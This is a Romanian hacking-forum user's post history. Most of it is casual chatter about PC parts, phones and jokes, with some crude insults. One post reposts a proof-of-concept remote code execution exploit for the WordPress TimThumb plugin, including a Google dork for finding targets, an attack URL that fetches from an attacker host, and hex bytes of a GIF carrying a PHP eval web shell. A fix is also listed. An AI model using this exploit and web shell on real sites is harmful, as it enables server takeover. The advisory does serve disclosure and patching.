-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Everything posted by LLegoLLaS
-
edit: ram: http://www.pcgarage.ro/memorii/kingston/valueram-4gb-ddr3-1333mhz-cl9-kit/ MB: http://www.pcgarage.ro/placi-de-baza/gigabyte/ga-g41mt-usb3/ CPU: http://www.pcgarage.ro/procesoare/intel/pentium-dual-core-e6600-306ghz-box/ gandeste-te si la video... un http://www.pcgarage.ro/placi-video/sapphire/radeon-hd6450-512mb-ddr5-64-bit/
-
pana la 1:05 ->isterica/paranoica speriata de un sobolan cu coarne/alta dracie dupa...FAiL
-
V-a dat cu rest faza cu gainile ca multi nu v-ati gandit (multi nu prea au habar ) ca banii nu sunt hartii ci au acoperire.Cand Bula™ cumpara inghetata ramane cu 22k si un obiect ce valoreaza 3k...deci ia mai ganditi-va bani = mere obiecte = pere (gaini,inghetate) nu poti scadea mere din pere si invers ...corect?
-
Salutare, bine-ai venit!Vi se trage de la atata apa sarata
-
Campionatul de Hacking faza pe Sate, editia 2011... descrie "atac" daca vrei sa il lasi pe Nea' Vasile potcovaru fara www n-ai decat sa le tai ombilicu' de net ps: P-aia cu providentul n-o vazusem
-
Visina de pe coliva: Google Traducere
-
sa-ti bagi adfly-u in cur ok?
-
Logic ca e real...daca printez acu si ma duc si pun intrebarile astea la 10 humanoizi de 18-19 de pe strada cel putin 2 nu rezolva tot
-
WordPress TimThumb Plugin - Remote Code Execution
LLegoLLaS replied to LLegoLLaS's topic in Exploituri
am vazut-o de-asta am postat -
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com # Date: 3rd August 2011 # Author: MaXe # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.32 # Screenshot: See attachment # Tested on: Windows XP + Apache + PHP (XAMPP) WordPress TimThumb (Theme) Plugin - Remote Code Execution Versions Affected: 1.* - 1.32 (Only version 1.19 and 1.32 were tested.) (Version 1.33 did not save the cache file as .php) Info: (See references for original advisory) TimThumb is an image resizing utility, widely used in many WordPress themes. Links: http://www.binarymoon.co.uk/projects/timthumb/ http://code.google.com/p/timthumb/ Credits: - Mark Maunder (Original Researcher) - MaXe (Indepedendent Proof of Concept Writer) -:: The Advisory ::- TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory. Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.) [url]http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php[/url] Stored file on the Target: (This can change from host to host.) 1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src); 1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src); md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format. PoC File: \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00 (Transparent GIF + <?php @eval($_GET['cmd']) ?> -:: Solution ::- Update to the latest version 1.34 or delete the timthumb file. NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.) find . | grep php | xargs grep -s timthumb Disclosure Information: - Vulnerability Disclosed (Mark Maunder): 1st August 2011 - Vulnerability Researched (MaXe): 2nd August 2011 - Disclosed at The Exploit Database: 3rd August 2011 References: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/ http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/ http://code.google.com/p/timthumb/issues/detail?id=212 http://programming.arantius.com/the+smallest+possible+gif Sursa
-
epic fail LE:Eu tot il folosesc cand instalez Geamuri sa descarc firefox sau chrome:))
-
spike e underground?
-
ideal e sa nu schimbi...e gabor nu isi da seama
-
Exista o multime de stari in care se poate afla un om...totusi cred ca pot fi impartite in doua categorii mari si late : tristete si bucurie/veselie: avem asa : ?ombladon-ultimul tren?? - YouTube ..ma gandesc la prea multe piese posibile...in prima categorie sigur mai sunt altii care transmit mai bine mesajul...
-
Nimic rau....numa stealer .Funny.Incearca pe 1freehosting.com
-
ai deja un topic la Offtopic "Cum se numeste melodia"data viitoare ai report
-
cu aia mai facem vreun egal ceva in deplasare:)) dar de la turcaleti si olandezi ne luam viol
-
hai sa-l punem la alegeri peste afisele cu geoana
-
What can i say?Nice description...
-
vrei neaparat de la aia?sau neaparat din alea 2? Nokia X2 - Full phone specifications http://www.gsmarena.com/nokia_c3-3269.php http://www.gsmarena.com/sony_ericsson_cedar-3404.php http://www.gsmarena.com/nokia_6303i_classic-3121.php